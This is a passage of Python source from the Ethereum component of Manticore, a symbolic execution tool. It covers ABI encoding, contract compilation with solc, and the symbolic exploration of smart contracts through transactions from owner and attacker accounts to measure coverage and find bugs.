address = Operators.ZEXTEND(ABI._readBE(buf[offset:offset + 20], 20, padding=False), 256)
func_id = buf[offset + 20:offset + 24]
result = (address, func_id)
elif ty[0] in ('bytes', 'string'):
dyn_offset = ABI._deserialize_int(buf[offset:offset + 32])
size = ABI._deserialize_int(buf[dyn_offset:dyn_offset + 32])
result = buf[dyn_offset + 32:dyn_offset + 32 + size]
elif ty[0] == 'tuple':
result = ()
current_off = 0
for ty_i in ty[1]:
result += (ABI._deserialize(ty_i, buf, offset), )
offset += ABI._type_size(ty_i)
elif ty[0] == 'array':
result = []
dyn_offset = ABI._deserialize_int(buf[offset:offset + 32])
rep = ty[1]
ty_size = ABI._type_size(ty[2])
if rep is None:
rep = ABI._deserialize_int(buf[dyn_offset:dyn_offset + 32])
dyn_offset += 32
for _ in range(rep):
result.append(ABI._deserialize(ty[2], buf, dyn_offset))
dyn_offset += ty_size
else:
raise NotImplementedError
return result
@staticmethod
def _serialize_uint(value, size=32, padding=0):
'''
Translates a python integral or a BitVec into a 32 byte string, MSB first
'''
if size <= 0 or size > 32:
raise ValueError
if not isinstance(value, (numbers.Integral, BitVec, EVMAccount)):
raise ValueError
if issymbolic(value):
# FIXME This temporary array variable should be obtained from a specific constraint store
bytes = ArrayVariable(index_bits=256, index_max=32, value_bits=8, name='temp{}'.format(uuid.uuid1()))
value = Operators.ZEXTEND(value, size * 8)
bytes.write_BE(padding, value, size)
else:
value = int(value)
bytes = bytearray()
for _ in range(padding):
bytes.append(0)
for position in reversed(range(size)):
bytes.append(Operators.EXTRACT(value, position * 8, 8))
assert len(bytes) == size + padding
return bytes
@staticmethod
def _serialize_int(value, size=32, padding=0):
'''
Translates a signed python integral or a BitVec into a 32 byte string, MSB first
'''
if size <= 0 or size > 32:
raise ValueError
if not isinstance(value, (numbers.Integral, BitVec)):
raise ValueError
if issymbolic(value):
bytes = ArrayVariable(index_bits=256, index_max=32, value_bits=8, name='temp{}'.format(uuid.uuid1()))
value = Operators.SIGNEXTEND(value, value.size, size * 8)
bytes.write_BE(padding, value, size)
else:
value = int(value)
bytes = bytearray()
for _ in range(padding):
bytes.append(0)
for position in reversed(range(size)):
bytes.append(Operators.EXTRACT(value, position * 8, 8))
return bytes
@staticmethod
def _readBE(data, nbytes, padding=True):
if padding:
pos = 32 - nbytes
size = 32
else:
pos = 0
size = nbytes
values = []
while pos < size:
if pos >= len(data):
values.append(0)
else:
values.append(data[pos])
pos += 1
return Operators.CONCAT(nbytes * 8, *values)
@staticmethod
def _deserialize_uint(data, nbytes=32, padding=0):
"""
Read a `nbytes` long big-endian unsigned integer from the start of `data`
:param data: sliceable buffer; symbolic buffer of Eth ABI encoded data
:param nbytes: number of bytes to read starting from least significant byte
:rtype: int or Expression
"""
assert isinstance(data, (bytearray, Array))
value = ABI._readBE(data, nbytes)
value = Operators.ZEXTEND(value, (nbytes + padding) * 8)
return value
@staticmethod
def _deserialize_int(data, nbytes=32, padding=0):
"""
Read a `nbytes` long big-endian signed integer from the start of `data`
:param data: sliceable buffer; symbolic buffer of Eth ABI encoded data
:param nbytes: number of bytes to read starting from least significant byte
:rtype: int or Expression
"""
assert isinstance(data, (bytearray, Array))
value = ABI._readBE(data, nbytes)
value = Operators.SEXTEND(value, nbytes * 8, (nbytes + padding) * 8)
if not issymbolic(value):
# sign bit on
if value & (1 << (nbytes * 8 - 1)):
value = -(((~value) + 1) & ((1 << (nbytes * 8)) - 1))
return value
class EVMAccount(object):
def __init__(self, address=None, manticore=None, name=None):
''' Encapsulates an account.
:param address: the address of this account
:type address: 160 bit long integer
:param manticore: the controlling Manticore
'''
self._manticore = manticore
self._address = address
self._name = name
@property
def name(self):
return self._name
@property
def address(self):
return self._address
def __int__(self):
return self._address
def __str__(self):
return str(self._address)
def __eq__(self, other):
if isinstance(other, EVMAccount):
return self._address == other._address
return self._address == other
class EVMContract(EVMAccount):
''' An EVM contract account '''
def __init__(self, default_caller=None, **kwargs):
''' Encapsulates a contract account.
:param default_caller: the default caller address for any transaction
'''
super(EVMContract, self).__init__(**kwargs)
self._default_caller = default_caller
self._hashes = None
def add_function(self, signature):
func_id = binascii.hexlify(ABI.function_selector(signature))
func_name = str(signature.split('(')[0])
if func_name.startswith('_') or func_name in {'add_function', 'address', 'name'}:
raise EthereumError("Sorry function name is used by the python wrapping")
if func_name in self._hashes:
raise EthereumError("A function with that name is already defined")
if func_id in {func_id for _, func_id in self._hashes.values()}:
raise EthereumError("A function with the same hash is already defined")
self._hashes[func_name] = signature, func_id
def _null_func(self):
pass
def _init_hashes(self):
#initializes self._hashes lazy
if self._hashes is None and self._manticore is not None:
self._hashes = {}
md = self._manticore.get_metadata(self._address)
if md is not None:
for signature, func_id in md._hashes.items():
self.add_function(signature)
# It was successful, no need to re-run. _init_hashes disabled
self._init_hashes = self._null_func
def __getattribute__(self, name):
''' If this is a contract account of which we know the functions hashes,
this will build the transaction for the function call.
Example use::
#call function `add` on contract_account with argument `1000`
contract_account.add(1000)
'''
if not name.startswith('_'):
self._init_hashes()
if self._hashes is not None and name in self._hashes.keys():
def f(*args, **kwargs):
caller = kwargs.get('caller', None)
value = kwargs.get('value', 0)
tx_data = ABI.function_call(str(self._hashes[name][0]), *args)
if caller is None:
caller = self._default_caller
self._manticore.transaction(caller=caller,
address=self._address,
value=value,
data=tx_data)
return f
return object.__getattribute__(self, name)
class ManticoreEVM(Manticore):
''' Manticore EVM manager
Usage Ex::
from manticore.ethereum import ManticoreEVM, ABI
m = ManticoreEVM()
#And now make the contract account to analyze
source_code = """
pragma solidity ^0.4.15;
contract AnInt {
uint private i=0;
function set(uint value){
i = value;
}
}
"""
#Initialize user and contracts
user_account = m.create_account(balance=1000)
contract_account = m.solidity_create_contract(source_code, owner=user_account, balance=0)
contract_account.set(12345, value=100)
m.report()
print m.coverage(contract_account)
'''
def make_symbolic_buffer(self, size, name='TXBUFFER'):
''' Creates a symbolic buffer of size bytes to be used in transactions.
You can operate on it normally and add constraints to manticore.constraints
via manticore.constrain(constraint_expression)
Example use::
symbolic_data = m.make_symbolic_buffer(320)
m.constrain(symbolic_data[0] == 0x65)
m.transaction(caller=attacker_account,
address=contract_account,
data=symbolic_data,
value=100000 )
'''
return self.constraints.new_array(index_bits=256, name=name, index_max=size, value_bits=8, taint=frozenset())
def make_symbolic_value(self, name='TXVALUE'):
''' Creates a symbolic value, normally a uint256, to be used in transactions.
You can operate on it normally and add constraints to manticore.constraints
via manticore.constrain(constraint_expression)
Example use::
symbolic_value = m.make_symbolic_value()
m.constrain(symbolic_value > 100)
m.constrain(symbolic_value < 1000)
m.transaction(caller=attacker_account,
address=contract_account,
data=data,
value=symbolic_value )
'''
return self.constraints.new_bitvec(256, name=name)
def make_symbolic_address(self, name='TXADDR', select='both'):
if select not in ('both', 'normal', 'contract'):
raise EthereumError('Wrong selection type')
if select in ('normal', 'contract'):
# FIXME need to select contracts or normal accounts
raise NotImplementedError
symbolic_address = self.make_symbolic_value(name=name)
constraint = symbolic_address == 0
for contract_account_i in map(int, self._accounts.values()):
constraint = Operators.OR(symbolic_address == contract_account_i, constraint)
self.constrain(constraint)
return symbolic_address
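# A usage sketch (the `m` and `user_account` names follow the class docstring example above):
# the returned 256-bit value is constrained to equal one of the already-known account
# addresses, so it can be used as the target of a symbolic transaction.
#
#     sym_addr = m.make_symbolic_address()
#     sym_data = m.make_symbolic_buffer(64)
#     m.transaction(caller=user_account, address=sym_addr, value=0, data=sym_data)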
def constrain(self, constraint):
self.constraints.add(constraint)
@staticmethod
def compile(source_code, contract_name=None, libraries=None, runtime=False, solc_bin=None, solc_remaps=[]):
''' Get initialization bytecode from a Solidity source code '''
name, source_code, init_bytecode, runtime_bytecode, srcmap, srcmap_runtime, hashes, abi, warnings = ManticoreEVM._compile(source_code, contract_name, libraries, solc_bin, solc_remaps)
if runtime:
return runtime_bytecode
return init_bytecode
@staticmethod
def _link(bytecode, libraries=None):
has_dependencies = '_' in bytecode
hex_contract = bytecode
if has_dependencies:
deps = {}
pos = 0
while pos < len(hex_contract):
if hex_contract[pos] == '_':
# __/tmp/tmp_9k7_l:Manticore______________
lib_placeholder = hex_contract[pos:pos + 40]
lib_name = lib_placeholder.split(':')[1].split('_')[0]
deps.setdefault(lib_name, []).append(pos)
pos += 40
else:
pos += 2
if libraries is None:
raise DependencyError(deps.keys())
libraries = dict(libraries)
hex_contract_lst = list(hex_contract)
for lib_name, pos_lst in deps.items():
try:
lib_address = libraries[lib_name]
except KeyError:
raise DependencyError([lib_name])
for pos in pos_lst:
hex_contract_lst[pos:pos + 40] = '%040x' % lib_address
hex_contract = ''.join(hex_contract_lst)
return bytearray(binascii.unhexlify(hex_contract))
@staticmethod
def _run_solc(source_file, solc_bin=None, solc_remaps=[]):
''' Compile a source file with the Solidity compiler
:param source_file: a file object for the source file
:param solc_bin: path to solc binary
:param solc_remaps: solc import remaps
:return: output, warnings
'''
if solc_bin is not None:
solc = solc_bin
else:
solc = "solc"
#check solc version
supported_versions = ('0.4.18', '0.4.21')
try:
installed_version_output = check_output([solc, "--version"])
except OSError:
raise EthereumError("Solidity compiler not installed.")
m = re.match(r".*Version: (?P<version>(?P<major>\d+)\.(?P<minor>\d+)\.(?P<build>\d+)).*\+(?P<commit>[^\s]+).*", installed_version_output, re.DOTALL | re.IGNORECASE)
if not m or m.groupdict()['version'] not in supported_versions:
#Fixme https://github.com/trailofbits/manticore/issues/847
#logger.warning("Unsupported solc version %s", installed_version)
pass
#shorten the path size so library placeholders won't fail.
#solc path search is a mess #fixme
#https://solidity.readthedocs.io/en/latest/layout-of-source-files.html
current_folder = os.getcwd()
abs_filename = os.path.abspath(source_file.name)
working_folder, filename = os.path.split(abs_filename)
solc_invocation = [
solc,
]
solc_invocation.extend(solc_remaps)
solc_invocation.extend([
'--combined-json', 'abi,srcmap,srcmap-runtime,bin,hashes,bin-runtime',
'--allow-paths', '.',
filename
])
p = Popen(solc_invocation, stdout=PIPE, stderr=PIPE, cwd=working_folder)
stdout, stderr = p.communicate()
try:
return json.loads(stdout), stderr
except ValueError:
raise EthereumError('Solidity compilation error:\n\n{}'.format(stderr))
@staticmethod
def _compile(source_code, contract_name, libraries=None, solc_bin=None, solc_remaps=[]):
""" Compile a Solidity contract, used internally
:param source_code: solidity source as either a string or a file handle
:param contract_name: a string with the name of the contract to analyze
:param libraries: an iterable of pairs (library_name, address)
:param solc_bin: path to solc binary
:param solc_remaps: solc import remaps
:return: name, source_code, bytecode, runtime, srcmap, srcmap_runtime, hashes, abi, warnings
"""
try:
file_type = file # Python 2
except NameError:
from io import IOBase
file_type = IOBase # Python 3
if isinstance(source_code, str):
with tempfile.NamedTemporaryFile() as temp:
temp.write(source_code)
temp.flush()
output, warnings = ManticoreEVM._run_solc(temp, solc_bin, solc_remaps)
elif isinstance(source_code, file_type):
output, warnings = ManticoreEVM._run_solc(source_code, solc_bin, solc_remaps)
source_code = source_code.read()
else:
raise TypeError
contracts = output.get('contracts', [])
if len(contracts) != 1 and contract_name is None:
raise EthereumError('Solidity file must contain exactly one contract, or you must use the contract_name parameter to specify which one.')
name, contract = None, None
if contract_name is None:
name, contract = contracts.items()[0]
else:
for n, c in contracts.items():
if n.split(":")[1] == contract_name:
name, contract = n, c
break
assert(name is not None)
name = name.split(':')[1]
if contract['bin'] == '':
raise EthereumError('Solidity failed to compile your contract.')
bytecode = ManticoreEVM._link(contract['bin'], libraries)
srcmap = contract['srcmap'].split(';')
srcmap_runtime = contract['srcmap-runtime'].split(';')
hashes = dict(((str(x), str(y)) for x, y in contract['hashes'].items()))
abi = json.loads(contract['abi'])
runtime = ManticoreEVM._link(contract['bin-runtime'], libraries)
return name, source_code, bytecode, runtime, srcmap, srcmap_runtime, hashes, abi, warnings
@property
def accounts(self):
return dict(self._accounts)
def account_name(self, address):
for name, account in self._accounts.iteritems():
if account.address == address:
return name
return '0x{:x}'.format(address)
@property
def normal_accounts(self):
return {name: account for name, account in self._accounts.iteritems() if not isinstance(account, EVMContract)}
@property
def contract_accounts(self):
return {name: account for name, account in self._accounts.iteritems() if isinstance(account, EVMContract)}
def get_account(self, name):
return self._accounts[name]
def __init__(self, procs=10, **kwargs):
''' A Manticore EVM manager
:param int procs: number of workers to use in the exploration
'''
self._accounts = dict()
self._config_procs = procs
# Make the constraint store
constraints = ConstraintSet()
# make the ethereum world state
world = evm.EVMWorld(constraints)
initial_state = State(constraints, world)
super(ManticoreEVM, self).__init__(initial_state, **kwargs)
self.constraints = ConstraintSet()
self.detectors = {}
self.metadata = {}
# The following should go to manticore.context so we can use multiprocessing
self.context['seth'] = {}
self.context['seth']['_saved_states'] = set()
self.context['seth']['_final_states'] = set()
self.context['seth']['_completed_transactions'] = 0
self._executor.subscribe('did_load_state', self._load_state_callback)
self._executor.subscribe('will_terminate_state', self._terminate_state_callback)
self._executor.subscribe('did_evm_execute_instruction', self._did_evm_execute_instruction_callback)
self._executor.subscribe('did_read_code', self._did_evm_read_code)
self._executor.subscribe('on_symbolic_sha3', self._symbolic_sha3)
self._executor.subscribe('on_concrete_sha3', self._concrete_sha3)
@property
def world(self):
''' The world instance or None if there is more than one state '''
return self.get_world(None)
@property
def completed_transactions(self):
with self.locked_context('seth') as context:
return context['_completed_transactions']
@property
def _running_state_ids(self):
''' IDs of the running states'''
with self.locked_context('seth') as context:
if self.initial_state is not None:
return tuple(context['_saved_states']) + (-1,)
else:
return tuple(context['_saved_states'])
@property
def _terminated_state_ids(self):
''' IDs of the terminated states '''
with self.locked_context('seth') as context:
return tuple(context['_final_states'])
@property
def _all_state_ids(self):
''' IDs of all the states
Note: the state with id -1 is already in memory and is not backed by storage
'''
return self._running_state_ids + self._terminated_state_ids
@property
def running_states(self):
''' Iterates over the running states'''
for state_id in self._running_state_ids:
state = self.load(state_id)
yield state
self.save(state, state_id=state_id) # overwrite old
@property
def terminated_states(self):
''' Iterates over the terminated states'''
for state_id in self._terminated_state_ids:
state = self.load(state_id)
yield state
self.save(state, state_id=state_id) # overwrite old
@property
def all_states(self):
''' Iterates over the all states (terminated and alive)'''
for state_id in self._all_state_ids:
state = self.load(state_id)
yield state
self.save(state, state_id=state_id) # overwrite old
def count_states(self):
''' Total states count '''
return len(self._all_state_ids)
def count_running_states(self):
''' Running states count '''
return len(self._running_state_ids)
def count_terminated_states(self):
''' Terminated states count '''
return len(self._terminated_state_ids)
def _terminate_state_id(self, state_id):
''' Manually terminates a state by state_id.
Moves the state from the running list into the terminated list
'''
if state_id != -1:
# Move state from running to final
with self.locked_context('seth') as seth_context:
saved_states = seth_context['_saved_states']
final_states = seth_context['_final_states']
if state_id in saved_states:
saved_states.remove(state_id)
final_states.add(state_id)
seth_context['_saved_states'] = saved_states  # TODO These two writes may not be needed in py3?
seth_context['_final_states'] = final_states
else:
assert state_id == -1
state_id = self.save(self._initial_state, final=True)
self._initial_state = None
return state_id
def _revive_state_id(self, state_id):
''' Manually revives a state by state_id.
Moves the state from the final list into the running list
'''
# Move state from final to running
if state_id != -1:
with self.locked_context('seth') as seth_context:
saved_states = seth_context['_saved_states']
final_states = seth_context['_final_states']
if state_id in final_states:
final_states.remove(state_id)
saved_states.add(state_id)
seth_context['_saved_states'] = saved_states
seth_context['_final_states'] = final_states
return state_id
# deprecate these 5 in favor of `for st in seth.all_states: ...`?
def get_world(self, state_id=None):
''' Returns the evm world of `state_id` state. '''
state = self.load(state_id)
if state is None:
return None
else:
return state.platform
def get_balance(self, address, state_id=None):
''' Balance for account `address` on state `state_id` '''
if isinstance(address, EVMAccount):
address = int(address)
return self.get_world(state_id).get_balance(address)
def get_storage_data(self, address, offset, state_id=None):
''' Storage data for `offset` on account `address` on state `state_id` '''
if isinstance(address, EVMAccount):
address = int(address)
return self.get_world(state_id).get_storage_data(address, offset)
def get_code(self, address, state_id=None):
''' Runtime code of account `address` on state `state_id` '''
if isinstance(address, EVMAccount):
address = int(address)
return self.get_world(state_id).get_code(address)
def last_return(self, state_id=None):
''' Last returned buffer for state `state_id` '''
state = self.load(state_id)
return state.platform.last_return_data
def transactions(self, state_id=None):
''' Transactions list for state `state_id` '''
state = self.load(state_id)
return state.platform.transactions
def make_symbolic_arguments(self, types):
'''
Make a reasonable serialization of the symbolic argument types
'''
# FIXME this is more naive than reasonable.
return ABI.deserialize(types, self.make_symbolic_buffer(32, name="INITARGS"))
def solidity_create_contract(self, source_code, owner, name=None, contract_name=None, libraries=None, balance=0, address=None, args=(), solc_bin=None, solc_remaps=[]):
''' Creates a solidity contract and library dependencies
:param str source_code: solidity source code
:param owner: owner account (will be default caller in any transactions)
:type owner: int or EVMAccount
:param contract_name: Name of the contract to analyze (optional if there is a single one in the source code)
:type contract_name: str
:param balance: balance to be transferred on creation
:type balance: int or SValue
:param address: the address for the new contract (optional)
:type address: int or EVMAccount
:param tuple args: constructor arguments
:param solc_bin: path to solc binary
:type solc_bin: str
:param solc_remaps: solc import remaps
:type solc_remaps: list of str
:rtype: EVMAccount
'''
if libraries is None:
deps = {}
else:
deps = dict(libraries)
contract_names = [contract_name]
while contract_names:
contract_name_i = contract_names.pop()
try:
compile_results = self._compile(source_code, contract_name_i, libraries=deps, solc_bin=solc_bin, solc_remaps=solc_remaps)
md = SolidityMetadata(*compile_results)
if contract_name_i == contract_name:
constructor_types = md.get_constructor_arguments()
if args is None:
args = self.make_symbolic_arguments(constructor_types)
contract_account = self.create_contract(owner=owner,
balance=balance,
address=address,
init=md._init_bytecode + ABI.serialize(constructor_types, *args),
name=name)
else:
contract_account = self.create_contract(owner=owner, init=md._init_bytecode)
if contract_account is None:
raise EthereumError("Failed to build contract %s" % contract_name_i)
self.metadata[int(contract_account)] = md
deps[contract_name_i] = contract_account
except DependencyError as e:
contract_names.append(contract_name_i)
for lib_name in e.lib_names:
if lib_name not in deps:
contract_names.append(lib_name)
if not self.count_running_states() or len(self.get_code(contract_account)) == 0:
return None
return contract_account
def create_contract(self, owner, balance=0, address=None, init=None, name=None):
''' Creates a contract
:param owner: owner account (will be default caller in any transactions)
:type owner: int or EVMAccount
:param balance: balance to be transferred on creation
:type balance: int or SValue
:param int address: the address for the new contract (optional)
:param str init: initializing evm bytecode and arguments
:param str name: a unique name for reference
:rtype: EVMAccount
'''
if not self.count_running_states():
raise NoAliveStates
if address is not None and address in map(int, self.accounts.values()):
# Address already used
raise EthereumError("Address already used")
# Let's just choose the address ourselves. This is not yellow paper material
if address is None:
address = self.new_address()
# Name check
if name is None:
name = self._get_uniq_name("contract")
if name in self._accounts:
# Account name already used
raise EthereumError("Name already used")
self._transaction('CREATE', owner, balance, address, data=init)
# TODO detect failure in the constructor
self._accounts[name] = EVMContract(address=address, manticore=self, default_caller=owner, name=name)
return self.accounts[name]
def _get_uniq_name(self, stem):
count = 0
for name_i in self.accounts.keys():
if name_i.startswith(stem):
try:
count = max(count, int(name_i[len(stem):]) + 1)
                except ValueError:
pass
name = "{:s}{:d}".format(stem, count)
assert name not in self.accounts
return name
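    # For reference: _get_uniq_name("contract") yields "contract0", then
    # "contract1", and so on, based on the largest numeric suffix already
    # present among the known account names.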
def new_address(self):
        ''' Create a fresh 160-bit address '''
new_address = random.randint(100, pow(2, 160))
if new_address in map(int, self.accounts.values()):
return self.new_address()
return new_address
def transaction(self, caller, address, value, data):
''' Issue a symbolic transaction in all running states
:param caller: the address of the account sending the transaction
:type caller: int or EVMAccount
:param address: the address of the contract to call
:type address: int or EVMAccount
            :param value: value to be transferred with the transaction
:type value: int or SValue
:param data: initial data
:raises NoAliveStates: if there are no alive states to execute
'''
self._transaction('CALL', caller, value=value, address=address, data=data)
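    # Illustrative usage (a minimal sketch, not from the original source; the
    # variable names are assumed) -- issue a fully symbolic call, as
    # multi_tx_analysis does below:
    #
    #   sym_data = m.make_symbolic_buffer(320)
    #   sym_value = m.make_symbolic_value()
    #   m.transaction(caller=attacker_account, address=contract_account,
    #                 data=sym_data, value=sym_value)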
def create_account(self, balance=0, address=None, code=None, name=None):
        ''' Low-level account creation; this won't generate a transaction.
:param balance: balance to be set on creation (optional)
:type balance: int or SValue
:param address: the address for the new account (optional)
:type address: int
:param code: the runtime code for the new account (None means normal account) (optional)
            :param name: a global account name, e.g. for use as a reference in the reports (optional)
:return: an EVMAccount
'''
# Need at least one state where to apply this
if not self.count_running_states():
raise NoAliveStates
# Name check
if name is None:
if code is None:
name = self._get_uniq_name("normal")
else:
name = self._get_uniq_name("contract")
if name in self._accounts:
# Account name already used
raise EthereumError("Name already used")
#Balance check
if not isinstance(balance, numbers.Integral):
raise EthereumError("Balance invalid type")
if isinstance(code, str):
code = bytearray(code)
if code is not None and not isinstance(code, (bytearray, Array)):
raise EthereumError("code bad type")
# Address check
        # Let's just choose the address ourselves. This is not yellow paper material
if address is None:
address = self.new_address()
if not isinstance(address, numbers.Integral):
raise EthereumError("A concrete address is needed")
assert address is not None
if address in map(int, self.accounts.values()):
# Address already used
raise EthereumError("Address already used")
# To avoid going full crazy we maintain a global list of addresses
# Different states may CREATE a different set of accounts.
# Accounts created by a human have the same address in all states.
for state in self.running_states:
world = state.platform
if '_pending_transaction' in state.context:
                raise EthereumError("This is bad. There should not be a pending transaction")
if address in world.accounts:
# Address already used
raise EthereumError("This is bad. Same address used for different contracts in different states")
world.create_account(address, balance, code=code, storage=None)
self._accounts[name] = EVMAccount(address, manticore=self, name=name)
return self.accounts[name]
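    # Illustrative usage (not from the original source; the name is assumed):
    #
    #   attacker_account = m.create_account(balance=1000, name='attacker')
    #
    # Human-created accounts get the same address in every running state, so
    # they can be referenced consistently across the whole exploration.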
def __migrate_expressions(self, new_constraints, old_constraints, caller, address, value, data):
# Copy global constraints into each state.
        # We should somehow remember what has been copied to each state.
        # In a second transaction we should only add new constraints.
        # And actually only constraints related to whatever we are using in
        # the tx. This is a FIXME.
migration_bindings = {}
if issymbolic(caller):
caller = new_constraints.migrate(caller, bindings=migration_bindings)
if issymbolic(address):
address = new_constraints.migrate(address, bindings=migration_bindings)
if issymbolic(value):
value = new_constraints.migrate(value, bindings=migration_bindings)
if issymbolic(data):
data = new_constraints.migrate(data, bindings=migration_bindings)
for c in old_constraints:
new_constraints.constraint(new_constraints.migrate(c, bindings=migration_bindings))
return new_constraints, caller, address, value, data
def _transaction(self, sort, caller, value=0, address=None, data=None, price=1):
        ''' Issues a transaction ('CREATE' or 'CALL') in all running states
            :param str sort: transaction type, either 'CREATE' or 'CALL'
            :param caller: caller account
            :type caller: int or EVMAccount
            :param int address: the address for the transaction (optional)
            :param value: value to be transferred
            :param price: the price of gas for this transaction. Mostly unused.
            :type value: int or SValue
            :param str data: initializing evm bytecode and arguments, or transaction call data
            :return: the address targeted by the transaction (the new contract address for a CREATE)
        '''
#Type Forgiveness
if isinstance(address, EVMAccount):
address = int(address)
if isinstance(caller, EVMAccount):
caller = int(caller)
#Defaults, call data is empty
if data is None:
data = bytearray(b"")
if isinstance(data, str):
data = bytearray(data)
if not isinstance(data, (bytearray, Array)):
raise EthereumError("code bad type")
# Check types
if not isinstance(caller, numbers.Integral):
raise EthereumError("Caller invalid type")
if not isinstance(value, (numbers.Integral, BitVec)):
raise EthereumError("Value invalid type")
if not isinstance(address, (numbers.Integral, BitVec)):
raise EthereumError("address invalid type")
if not isinstance(price, numbers.Integral):
raise EthereumError("Price invalid type")
# Check argument consistency and set defaults ...
if sort not in ('CREATE', 'CALL'):
raise ValueError('unsupported transaction type')
# Caller must be a normal known account
if caller not in self._accounts.values():
raise EthereumError("Unknown caller address!")
if sort == 'CREATE':
#let's choose an address here for now #NOTYELLOW
if address is None:
address = self.new_address()
# When creating data is the init_bytecode + arguments
if len(data) == 0:
raise EthereumError("An initialization bytecode is needed for a CREATE")
assert address is not None
assert caller is not None
        # Transactions (like everything else) need at least one running state
if not self.count_running_states():
raise NoAliveStates
# To avoid going full crazy we maintain a global list of addresses
for state in self.running_states:
world = state.platform
if '_pending_transaction' in state.context:
                raise EthereumError("This is bad. There should not be a pending transaction")
# Migrate any expression to state specific constraint set
_, caller, address, value, data = self.__migrate_expressions(state.constraints, self.constraints, caller, address, value, data)
# Different states may CREATE a different set of accounts. Accounts
            # that were created by a human have the same address in all states.
# This diverges from the yellow paper but at least we check that we
# are not trying to create an already used address here
if sort == 'CREATE':
if address in world.accounts:
# Address already used
raise EthereumError("This is bad. Same address used for different contracts in different states")
state.context['_pending_transaction'] = (sort, caller, address, value, data, price)
        # Run over potentially several states,
        # generating potentially several others
self.run(procs=self._config_procs)
return address
def multi_tx_analysis(self, solidity_filename, contract_name=None, tx_limit=None, tx_use_coverage=True, tx_account="combo1", args=None):
owner_account = self.create_account(balance=1000, name='owner')
attacker_account = self.create_account(balance=1000, name='attacker')
# Pretty print
logger.info("Starting symbolic create contract")
with open(solidity_filename) as f:
contract_account = self.solidity_create_contract(f, contract_name=contract_name, owner=owner_account, args=args)
if tx_account == "attacker":
tx_account = [attacker_account]
elif tx_account == "owner":
tx_account = [owner_account]
elif tx_account == "combo1":
tx_account = [owner_account, attacker_account]
else:
raise EthereumError('The account to perform the symbolic exploration of the contract should be "attacker", "owner" or "combo1"')
if contract_account is None:
logger.info("Failed to create contract. Exception in constructor")
self.finalize()
return
prev_coverage = 0
current_coverage = 0
tx_no = 0
while (current_coverage < 100 or not tx_use_coverage) and not self.is_shutdown():
try:
logger.info("Starting symbolic transaction: %d", tx_no)
# run_symbolic_tx
symbolic_data = self.make_symbolic_buffer(320)
symbolic_value = self.make_symbolic_value()
self.transaction(caller=tx_account[min(tx_no, len(tx_account) - 1)],
address=contract_account,
data=symbolic_data,
value=symbolic_value)
logger.info("%d alive states, %d terminated states", self.count_running_states(), self.count_terminated_states())
except NoAliveStates:
break
            # Check if the maximum number of transactions was reached
if tx_limit is not None and tx_no + 1 == tx_limit:
break
# Check if coverage has improved or not
if tx_use_coverage:
prev_coverage = current_coverage
current_coverage = self.global_coverage(contract_account)
found_new_coverage = prev_coverage < current_coverage
if not found_new_coverage:
break
tx_no += 1
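    # Illustrative driver loop (a minimal sketch, not from the original source;
    # the file name is assumed):
    #
    #   m = ManticoreEVM()
    #   m.multi_tx_analysis('example.sol', tx_limit=3)
    #   m.finalize()
    #
    # Exploration stops when coverage stops improving, the transaction limit is
    # reached, no alive states remain, or a shutdown was requested.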
def run(self, **kwargs):
''' Run any pending transaction on any running state '''
# Check if there is a pending transaction
with self.locked_context('seth') as context:
            # there are no states added to the executor queue yet
assert len(self._executor.list()) == 0
for state_id in context['_saved_states']:
self._executor.put(state_id)
context['_saved_states'] = set()
# A callback will use _pending_transaction and issue the transaction
# in each state (see load_state_callback)
super(ManticoreEVM, self).run(**kwargs)
with self.locked_context('seth') as context:
if len(context['_saved_states']) == 1:
self._initial_state = self._executor._workspace.load_state(context['_saved_states'].pop(), delete=True)
context['_saved_states'] = set()
assert self._running_state_ids == (-1,)
def save(self, state, state_id=None, final=False):
''' Save a state in secondary storage and add it to running or final lists
:param state: A manticore State
:param state_id: if not None force state_id (overwrite)
:param final: True if state is final
:returns: a state id
'''
# If overwriting then the state_id must be known
if state_id is not None:
if state_id not in self._all_state_ids:
raise EthereumError("Trying to overwrite unknown state_id")
with self.locked_context('seth') as context:
context['_final_states'].discard(state_id)
context['_saved_states'].discard(state_id)
if state_id != -1:
# save the state to secondary storage
state_id = self._executor._workspace.save_state(state, state_id=state_id)
with self.locked_context('seth') as context:
if final:
# Keep it on a private list
context['_final_states'].add(state_id)
else:
# Keep it on a private list
context['_saved_states'].add(state_id)
return state_id
def load(self, state_id=None):
''' Load one of the running or final states.
:param state_id: If None it assumes there is a single running state
:type state_id: int or None
'''
state = None
if state_id is None:
#a single state was assumed
if self.count_running_states() == 1:
#Get the ID of the single running state
state_id = self._running_state_ids[0]
else:
raise EthereumError("More than one state running, you must specify state id.")
if state_id == -1:
state = self.initial_state
else:
state = self._executor._workspace.load_state(state_id, delete=False)
        # Forward events from the newly loaded object
self._executor.forward_events_from(state, True)
return state
# Callbacks
def _symbolic_sha3(self, state, data, known_hashes):
''' INTERNAL USE '''
with self.locked_context('known_sha3', set) as known_sha3:
state.platform._sha3.update(known_sha3)
def _concrete_sha3(self, state, buf, value):
''' INTERNAL USE '''
with self.locked_context('known_sha3', set) as known_sha3:
known_sha3.add((str(buf), value))
def _terminate_state_callback(self, state, state_id, e):
''' INTERNAL USE
            Every time a state finishes executing the last transaction, we save it in
            our private list
'''
if str(e) == 'Abandoned state':
#do nothing
return
world = state.platform
state.context['last_exception'] = e
e.testcase = False # Do not generate a testcase file
if not world.all_transactions:
logger.debug("Something was wrong. Search terminated in the middle of an ongoing tx")
self.save(state, final=True)
return
tx = world.all_transactions[-1]
        # If we initiated the tx we need to process the outcome for now.
        # FIXME: incomplete.
if tx.is_human():
if tx.sort == 'CREATE':
if tx.result == 'RETURN':
world.set_code(tx.address, tx.return_data)
else:
world.delete_account(tx.address)
else:
logger.info("Manticore exception. State should be terminated only at the end of the human transaction")
        # A human tx that ends in one of these results won't modify the storage, so
        # finalize and generate a testcase. FIXME: this should be configurable, as
        # REVERT and THROW actually change the balance and (nonce?) of some accounts
if tx.result in {'REVERT', 'THROW', 'TXERROR'}:
self.save(state, final=True)
else:
assert tx.result in {'SELFDESTRUCT', 'RETURN', 'STOP'}
# if not a revert we save the state for further transactioning
self.save(state) # Add to running states
#Callbacks
def _load_state_callback(self, state, state_id):
''' INTERNAL USE
            When a state has just been loaded from storage we issue the pending transaction
'''
if '_pending_transaction' not in state.context:
return
world = state.platform
ty, caller, address, value, data, price = state.context['_pending_transaction']
del state.context['_pending_transaction']
if ty == 'CALL':
world.transaction(address=address, caller=caller, data=data, value=value, price=price)
else:
assert ty == 'CREATE'
world.create_contract(caller=caller, address=address, balance=value, init=data, price=price)
def _did_evm_execute_instruction_callback(self, state, instruction, arguments, result_ref):
